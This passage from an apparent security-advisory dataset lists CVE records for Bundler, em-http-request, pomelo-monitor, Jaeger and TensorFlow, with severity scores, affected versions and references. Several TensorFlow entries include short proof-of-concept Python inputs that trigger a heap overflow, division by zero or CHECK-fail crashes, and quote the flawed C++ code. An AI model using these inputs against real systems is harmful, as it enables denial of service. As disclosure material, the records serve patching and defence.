2.2.17 sometimes chooses a dependency source based on the highest gem version number, which means that a rogue gem found at a public source may be chosen, even if the intended choice was a private gem that is a dependency of another private gem that is explicitly depended on by the application.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'bundler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0'}, {'fixed': '2.2.10'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'bundler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.11'}, {'fixed': '2.2.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36327'}, {'type': 'WEB', 'url': 'https://github.com/rubygems/rubygems/issues/3982'}, {'type': 'WEB', 'url': 'https://github.com/rubygems/rubygems/pull/4609'}, {'type': 'WEB', 'url': 'https://github.com/rubygems/rubygems/commit/078bf682ac40017b309b5fc69f283ff640e7c129'}, {'type': 'WEB', 'url': 'https://bundler.io/blog/2021/02/15/a-more-secure-bundler-we-fixed-our-source-priorities.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/rubygems/rubygems'}, {'type': 'WEB', 'url': 'https://github.com/rubygems/rubygems/blob/master/bundler/CHANGELOG.md#2218-may-25-2021'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bundler/CVE-2020-36327.yml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MWXHK5UUHVSHF7HTHMX6JY3WXDVNIHSL/'}, {'type': 'WEB', 'url': 'https://mensfeld.pl/2021/02/rubygems-dependency-confusion-attack-side-of-things/'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24105'}, {'type': 'WEB', 'url': 'https://www.zofrex.com/blog/2021/04/29/bundler-still-vulnerable-dependency-confusion-cve-2020-36327/'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:48:14Z', 'nvd_published_at': '2021-04-29T03:15:00Z'}" +1.4.0,GHSA-q27f-v3r6-9v77,2023-08-08T16:34:06Z,2021-05-24T18:13:13Z,,['CVE-2020-13482'],Improper Certificate Validation in EM-HTTP-Request,EM-HTTP-Request 1.1.5 uses the library eventmachine in an insecure way that allows an attacker to perform a man-in-the-middle attack against users of the library. The hostname in a TLS server certificate is not verified.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'em-http-request'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13482'}, {'type': 'WEB', 'url': 'https://github.com/igrigorik/em-http-request/issues/339'}, {'type': 'WEB', 'url': 'https://github.com/igrigorik/em-http-request/commit/e5fa144f8d21050dd1fc15a4dc8aa34ac6f30602'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-q27f-v3r6-9v77'}, {'type': 'PACKAGE', 'url': 'https://github.com/igrigorik/em-http-request'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/em-http-request/CVE-2020-13482.yml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKYP5TR5NTVVDX5R4HCNNH2OQR7M4X3J/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z32PUJA6RGBZ3TKSOTGUXZ45662S3MVF/'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-14T18:46:59Z', 'nvd_published_at': '2020-05-25T22:15:00Z'}" +1.4.0,GHSA-4hrh-9vmp-2jgg,2021-05-18T21:54:20Z,2021-05-21T14:23:15Z,,['CVE-2021-29542'],Heap buffer overflow in `StringNGrams`,"### Impact +An attacker can cause a heap buffer overflow by passing crafted inputs to `tf.raw_ops.StringNGrams`: + +```python +import tensorflow as tf + +separator = b'\x02\x00' +ngram_widths = [7, 6, 11] +left_pad = b'\x7f\x7f\x7f\x7f\x7f' +right_pad = b'\x7f\x7f\x25\x5d\x53\x74' +pad_width = 50 +preserve_short_sequences = True + +l = ['', '', '', '', '', '', '', '', '', '', ''] + +data = tf.constant(l, shape=[11], dtype=tf.string) + +l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 3] +data_splits = tf.constant(l2, shape=[116], dtype=tf.int64) + +out = tf.raw_ops.StringNGrams(data=data, + data_splits=data_splits, separator=separator, + ngram_widths=ngram_widths, left_pad=left_pad, + right_pad=right_pad, pad_width=pad_width, + preserve_short_sequences=preserve_short_sequences) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/1cdd4da14282210cc759e468d9781741ac7d01bf/tensorflow/core/kernels/string_ngrams_op.cc#L171-L185) fails to consider corner cases where input would be split in such a way that the generated tokens should only contain padding elements: + +```cc +for (int ngram_index = 0; ngram_index < num_ngrams; ++ngram_index) { + int pad_width = get_pad_width(ngram_width); + int left_padding = std::max(0, pad_width - ngram_index); + int right_padding = std::max(0, pad_width - (num_ngrams - (ngram_index + 1))); + int num_tokens = ngram_width - (left_padding + right_padding); + int data_start_index = left_padding > 0 ? 0 : ngram_index - pad_width; + ... + tstring* ngram = &output[ngram_index]; + ngram->reserve(ngram_size); + for (int n = 0; n < left_padding; ++n) { + ngram->append(left_pad_); + ngram->append(separator_); + } + for (int n = 0; n < num_tokens - 1; ++n) { + ngram->append(data[data_start_index + n]); + ngram->append(separator_); + } + ngram->append(data[data_start_index + num_tokens - 1]); // <<< + for (int n = 0; n < right_padding; ++n) { + ngram->append(separator_); + ngram->append(right_pad_); + } + ... +} +``` + +If input is such that `num_tokens` is 0, then, for `data_start_index=0` (when left padding is present), the marked line would result in reading `data[-1]`. + +### Patches +We have patched the issue in GitHub commit [ba424dd8f16f7110eea526a8086f1a155f14f22b](https://github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4hrh-9vmp-2jgg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29542'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b'}]","{'cwe_ids': ['CWE-131', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:54:20Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-qg48-85hg-mqc5,2021-05-18T20:58:24Z,2021-05-21T14:23:55Z,,['CVE-2021-29554'],Division by 0 in `DenseCountSparseOutput`,"### Impact +An attacker can cause a denial of service via a FPE runtime error in `tf.raw_ops.DenseCountSparseOutput`: + +```python +import tensorflow as tf + +values = tf.constant([], shape=[0, 0], dtype=tf.int64) +weights = tf.constant([]) + +tf.raw_ops.DenseCountSparseOutput( + values=values, weights=weights, + minlength=-1, maxlength=58, binary_output=True) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/efff014f3b2d8ef6141da30c806faf141297eca1/tensorflow/core/kernels/count_ops.cc#L123-L127) computes a divisor value from user data but does not check that the result is 0 before doing the division: + +```cc +int num_batch_elements = 1; +for (int i = 0; i < num_batch_dimensions; ++i) { + num_batch_elements *= data.shape().dim_size(i); +} +int num_value_elements = data.shape().num_elements() / num_batch_elements; +``` + +Since `data` is given by the `values` argument, `num_batch_elements` is 0. + +### Patches +We have patched the issue in GitHub commit [da5ff2daf618591f64b2b62d9d9803951b945e9f](https://github.com/tensorflow/tensorflow/commit/da5ff2daf618591f64b2b62d9d9803951b945e9f). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, and TensorFlow 2.3.3, as these are also affected. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qg48-85hg-mqc5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29554'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/da5ff2daf618591f64b2b62d9d9803951b945e9f'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:58:24Z', 'nvd_published_at': '2021-05-14T19:15:00Z'}" +1.4.0,GHSA-wp3c-xw9g-gpcg,2021-05-18T19:12:41Z,2021-05-21T14:25:16Z,,['CVE-2021-29567'],Lack of validation in `SparseDenseCwiseMul`,"### Impact +Due to lack of validation in `tf.raw_ops.SparseDenseCwiseMul`, an attacker can trigger denial of service via `CHECK`-fails or accesses to outside the bounds of heap allocated data: + +```python +import tensorflow as tf + +indices = tf.constant([], shape=[10, 0], dtype=tf.int64) +values = tf.constant([], shape=[0], dtype=tf.int64) +shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) +dense = tf.constant([], shape=[0], dtype=tf.int64) + +tf.raw_ops.SparseDenseCwiseMul( + sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense) +``` + +Since the [implementation](https://github.com/tensorflow/tensorflow/blob/38178a2f7a681a7835bb0912702a134bfe3b4d84/tensorflow/core/kernels/sparse_dense_binary_op_shared.cc#L68-L80) only validates the rank of the input arguments but no [constraints between dimensions](https://www.tensorflow.org/api_docs/python/tf/raw_ops/SparseDenseCwiseMul), an attacker can abuse them to trigger internal `CHECK` assertions (and cause program termination, denial of service) or to write to memory outside of bounds of heap allocated tensor buffers. + +### Patches +We have patched the issue in GitHub commit [7ae2af34087fb4b5c8915279efd03da3b81028bc](https://github.com/tensorflow/tensorflow/commit/7ae2af34087fb4b5c8915279efd03da3b81028bc). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-wp3c-xw9g-gpcg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29567'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7ae2af34087fb4b5c8915279efd03da3b81028bc'}]","{'cwe_ids': ['CWE-617'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T19:12:41Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-6qgm-fv6v-rfpv,2021-05-18T18:28:23Z,2021-05-21T14:26:13Z,,['CVE-2021-29575'],Overflow/denial of service in `tf.raw_ops.ReverseSequence`,"### Impact +The implementation of `tf.raw_ops.ReverseSequence` allows for stack overflow and/or `CHECK`-fail based denial of service. + +```python +import tensorflow as tf + +input = tf.zeros([1, 1, 1], dtype=tf.int32) +seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) + +tf.raw_ops.ReverseSequence( + input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/5b3b071975e01f0d250c928b2a8f901cd53b90a7/tensorflow/core/kernels/reverse_sequence_op.cc#L114-L118) fails to validate that `seq_dim` and `batch_dim` arguments are valid. + +Negative values for `seq_dim` can result in stack overflow or `CHECK`-failure, depending on the version of Eigen code used to implement the operation. Similar behavior can be exhibited by invalid values of `batch_dim`. + +### Patches +We have patched the issue in GitHub commit [ecf768cbe50cedc0a45ce1ee223146a3d3d26d23](https://github.com/tensorflow/tensorflow/commit/ecf768cbe50cedc0a45ce1ee223146a3d3d26d23). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6qgm-fv6v-rfpv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29575'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ecf768cbe50cedc0a45ce1ee223146a3d3d26d23'}]","{'cwe_ids': ['CWE-119', 'CWE-120', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T18:28:23Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-4j54-mxf6-wxx2,2021-07-28T21:52:51Z,2021-05-10T18:37:16Z,,['CVE-2020-7620'],OS Command Injection in pomelo-monitor,pomelo-monitor through 0.3.7 is vulnerable to Command Injection.It allows injection of arbitrary commands as part of 'pomelo-monitor' params.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'pomelo-monitor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7620'}, {'type': 'WEB', 'url': 'https://github.com/halfblood369/monitor/blob/900b5cadf59edcccac4754e5706a22719925ddb9/lib/processMonitor.js,'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-POMELOMONITOR-173695'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T18:24:08Z', 'nvd_published_at': '2020-04-02T21:15:00Z'}" +1.4.0,GHSA-gh32-pc56-4c96,2023-09-15T19:47:45Z,2021-05-18T18:35:02Z,,['CVE-2020-10750'],Information Exposure in jaeger,Sensitive information written to a log file vulnerability was found in jaegertracing/jaeger before version 1.18.1 when the Kafka data store is used. This flaw allows an attacker with access to the container's log file to discover the Kafka credentials.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/jaegertracing/jaeger'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10750'}, {'type': 'WEB', 'url': 'https://github.com/jaegertracing/jaeger/commit/360c38bec3f9718ebba7ddbf0b409b05995f3ace'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1838401'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10750'}, {'type': 'WEB', 'url': 'https://github.com/jaegertracing/jaeger/releases/tag/v1.18.1'}]","{'cwe_ids': ['CWE-200', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T14:55:16Z', 'nvd_published_at': None}" +1.4.0,GHSA-wvjw-p9f5-vq28,2021-05-17T21:06:57Z,2021-05-21T14:29:02Z,,['CVE-2021-29619'],Segfault in `tf.raw_ops.SparseCountSparseOutput`,"### Impact +Passing invalid arguments (e.g., discovered via fuzzing) to `tf.raw_ops.SparseCountSparseOutput` results in segfault. + +### Patches +We have patched the issue in GitHub commit [82e6203221865de4008445b13c69b6826d2b28d9](https://github.com/tensorflow/tensorflow/commit/82e6203221865de4008445b13c69b6826d2b28d9). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-wvjw-p9f5-vq28'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29619'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/82e6203221865de4008445b13c69b6826d2b28d9'}]","{'cwe_ids': ['CWE-755'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': 